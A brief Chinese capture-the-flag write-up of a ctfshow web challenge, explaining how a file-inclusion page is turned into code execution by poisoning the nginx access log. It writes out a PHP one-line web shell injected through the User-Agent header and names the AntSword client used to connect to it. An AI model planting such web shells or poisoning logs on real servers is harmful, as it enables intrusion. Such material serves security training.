1. 题目描述
题目链接:戳我💋
2. 解题过程
打开网站看到如下

感觉跟 web3php 伪协议有点像
测试下

报错
再看下能不能看到目录

可以看到目录,但是不能用 php 伪协议
再看下日志目录/var/log/nginx/access.log

想到一句话木马
在 UA 头里注入<?php @eval($_POST['shell']);?>,然后打开中国蚁剑,密码shell

打开中国蚁剑

直接可以看到 flag.txt 文件

获得 flag:ctfshow{a4ed541d-f400-4bdb-b6e1-688a1a87327a}

3. 所需工具
4. 写在最后
本文完
敬爱与明天🌹